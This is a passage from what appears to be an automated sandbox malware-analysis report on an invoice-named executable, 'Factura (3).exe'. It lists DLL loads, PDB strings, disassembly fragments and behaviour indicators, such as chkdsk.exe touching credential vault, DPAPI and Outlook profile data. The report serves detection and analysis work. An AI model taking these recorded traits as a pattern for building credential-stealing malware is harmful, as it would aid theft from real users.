            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkdsk.exeSection loaded: ulib.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkdsk.exeSection loaded: ifsutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkdsk.exeSection loaded: devobj.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkdsk.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkdsk.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkdsk.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkdsk.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkdsk.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkdsk.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkdsk.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkdsk.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkdsk.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkdsk.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkdsk.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkdsk.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkdsk.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkdsk.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkdsk.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkdsk.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkdsk.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkdsk.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkdsk.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkdsk.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkdsk.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkdsk.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkdsk.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkdsk.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkdsk.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: Factura (3).exeStatic PE information: Image base 0x140000000 > 0x60000000
            Source: Factura (3).exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
            Source: Factura (3).exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: System.Configuration.Install.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000009.00000002.1606616466.000001CE29F1E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Data.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000009.00000002.1606616466.000001CE29F1E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Xml.pdbp source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: symbols\dll\System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.1563023145.0000000B0F501000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb! source: powershell.exe, 00000009.00000002.1606616466.000001CE29F1E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\dll\System.Core.pdbN source: powershell.exe, 00000009.00000002.1606616466.000001CE29F1E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: csc.exe, csc.exe, 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, csc.exe, 0000000E.00000003.1424584842.0000000005012000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 0000000E.00000002.1567920536.000000000550E000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, chkdsk.exe, 00000017.00000002.3766101465.00000000053B0000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 00000017.00000003.1567081999.000000000505D000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000017.00000002.3766101465.000000000554E000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 00000017.00000003.1569342109.0000000005202000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: Microsoft.VisualBasic.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb" source: powershell.exe, 00000009.00000002.1606616466.000001CE29F9E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Numerics.ni.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: chkdsk.pdbGCTL source: csc.exe, 0000000E.00000002.1567571580.0000000004F17000.00000004.00000020.00020000.00000000.sdmp, KAnMKAQhHABqpRuDRpLtww.exe, 00000014.00000002.3764224956.0000000001558000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: Microsoft.PowerShell.Commands.Management.ni.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.DirectoryServices.ni.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbpdb source: powershell.exe, 00000009.00000002.1604691590.000001CE29C10000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb" source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.Management.ni.pdbRSDSJ< source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: chkdsk.pdb source: csc.exe, 0000000E.00000002.1567571580.0000000004F17000.00000004.00000020.00020000.00000000.sdmp, KAnMKAQhHABqpRuDRpLtww.exe, 00000014.00000002.3764224956.0000000001558000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mscorlib.ni.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb source: powershell.exe, 00000009.00000002.1606616466.000001CE29F9E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 00000009.00000002.1606616466.000001CE29F1E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: Microsoft.Management.Infrastructure.ni.pdbRSDS source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.1606616466.000001CE29F9E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: e.pdb source: powershell.exe, 00000009.00000002.1606616466.000001CE29F9E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: Microsoft.VisualBasic.ni.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: Microsoft.PowerShell.Security.ni.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.pdb` source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.DirectoryServices.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: wntdll.pdbUGP source: csc.exe, 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, csc.exe, 0000000E.00000003.1424584842.0000000005012000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 0000000E.00000002.1567920536.000000000550E000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 00000017.00000002.3766101465.00000000053B0000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 00000017.00000003.1567081999.000000000505D000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000017.00000002.3766101465.000000000554E000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 00000017.00000003.1569342109.0000000005202000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: Microsoft.PowerShell.Commands.Management.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.Data.ni.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.Configuration.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: \??\C:\Windows\System.Core.pdbpdb< source: powershell.exe, 00000009.00000002.1606616466.000001CE29F1E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: Microsoft.PowerShell.ConsoleHost.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000009.00000002.1606616466.000001CE29F1E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Management.Automation.ni.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.Numerics.ni.pdbRSDSautg source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.Data.pdbH source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.Management.Automation.ni.pdbRSDS source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.1606616466.000001CE29EE0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1563023145.0000000B0F501000.00000004.00000010.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1606616466.000001CE29F04000.00000004.00000020.00020000.00000000.sdmp, WERFCB2.tmp.dmp.17.dr
            Source: Binary string: mscorlib.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: \??\C:\Windows\System.Core.pdb source: powershell.exe, 00000009.00000002.1606616466.000001CE29F1E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: Microsoft.PowerShell.Security.ni.pdbRSDS~ source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.Management.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: Microsoft.Management.Infrastructure.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.Management.ni.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.Numerics.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: omation.pdbVX source: powershell.exe, 00000009.00000002.1563023145.0000000B0F501000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: mscorlib.pdbp^ source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.Management.Automation.pdb! source: powershell.exe, 00000009.00000002.1606616466.000001CE29F1E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: XC:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.1563023145.0000000B0F501000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: assembly\GAC_MSC:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbPE source: powershell.exe, 00000009.00000002.1563023145.0000000B0F501000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: Microsoft.PowerShell.Security.pdb` source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: Microsoft.PowerShell.Commands.Management.ni.pdbRSDS source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.DirectoryServices.ni.pdbRSDS source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.Management.pdbh source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.Configuration.Install.ni.pdbRSDSQ source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdb source: powershell.exe, 00000009.00000002.1606616466.000001CE29F9E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Xml.ni.pdbRSDS# source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.Core.ni.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdbD;. source: powershell.exe, 00000009.00000002.1606616466.000001CE29F9E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000009.00000002.1604691590.000001CE29C57000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\mscorlib.pdb0 source: powershell.exe, 00000009.00000002.1606616466.000001CE29F1E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdbRSDS[q source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: KAnMKAQhHABqpRuDRpLtww.exe, 00000014.00000002.3762440528.000000000097E000.00000002.00000001.01000000.00000009.sdmp, KAnMKAQhHABqpRuDRpLtww.exe, 00000018.00000000.1640062378.000000000097E000.00000002.00000001.01000000.00000009.sdmp
            Source: Binary string: System.Configuration.Install.ni.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb0OJ source: powershell.exe, 00000009.00000002.1606616466.000001CE29F1E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdbRSDS source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.Management.Automation.pdbmation.pdbpdbion.pdbment.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.1563023145.0000000B0F501000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: Microsoft.PowerShell.Security.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.Xml.ni.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: Microsoft.VisualBasic.pdb8 source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.ni.pdbRSDS source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.1606616466.000001CE29F9E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.1604691590.000001CE29CE3000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Configuration.ni.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb@ source: powershell.exe, 00000009.00000002.1606616466.000001CE29F9E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Data.ni.pdbRSDSC source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.Xml.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: powershell.exe, 00000009.00000002.1606616466.000001CE29EE0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1606616466.000001CE29F1E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1606616466.000001CE29F04000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdbrogram x source: powershell.exe, 00000009.00000002.1606616466.000001CE29F9E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000009.00000002.1606616466.000001CE29F9E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.Management.Automation.pdb3 source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.Core.pdb source: powershell.exe, 00000009.00000002.1606616466.000001CE29EE0000.00000004.00000020.00020000.00000000.sdmp, WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.Transactions.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.Core.pdbiy source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: Microsoft.Management.Infrastructure.ni.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.Transactions.ni.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.Transactions.ni.pdbRSDS source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.ni.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.Core.ni.pdbRSDS source: WERFCB2.tmp.dmp.17.dr
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"Jump to behavior
            Source: Factura (3).exeStatic PE information: section name: _RDATA
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FF887DB00BD pushad ; iretd 9_2_00007FF887DB00C1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_00414074 push eax; retf 14_2_00414173
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_00412002 push esp; retf 14_2_00412043
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_00414138 push eax; retf 14_2_00414173
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_004039F0 push eax; ret 14_2_004039F2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_004239A3 push edi; ret 14_2_004239AB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_004052EB push es; ret 14_2_004052F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_00425B23 push edi; ret 14_2_00425B2E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_00405664 push esp; retf 14_2_0040567A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_00411788 push esp; ret 14_2_00411789
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_00411FB3 push esp; retf 14_2_00412043
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053A09AD push ecx; mov dword ptr [esp], ecx14_2_053A09B6
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_053E09AD push ecx; mov dword ptr [esp], ecx23_2_053E09B6
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_00772130 push edi; ret 23_2_0077213B
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_00772127 push edi; ret 23_2_0077213B
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_0075E5C0 push esp; retf 23_2_0075E650
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_0075E600 push esp; retf 23_2_0075E650
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_007518F8 push es; ret 23_2_007518FD
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_0076A90C push 69F0026Ch; retf 23_2_0076A91B
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_0076AA4D pushad ; retf 23_2_0076AA6A
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_00770B9C push cs; iretd 23_2_00770BD0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_00751C71 push esp; retf 23_2_00751C87
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_0076FDC3 push ss; iretd 23_2_0076FDD4
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_0075DD95 push esp; ret 23_2_0075DD96
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_00771FD2 pushad ; iretd 23_2_00772046
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_0076FFB0 push edi; ret 23_2_0076FFB8
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_0076FFA7 push edi; ret 23_2_0076FFB8
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_00771FAD pushad ; iretd 23_2_00772046

            Hooking and other Techniques for Hiding and Protection

            barindex
            Loading BitLocker PowerShell Module
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
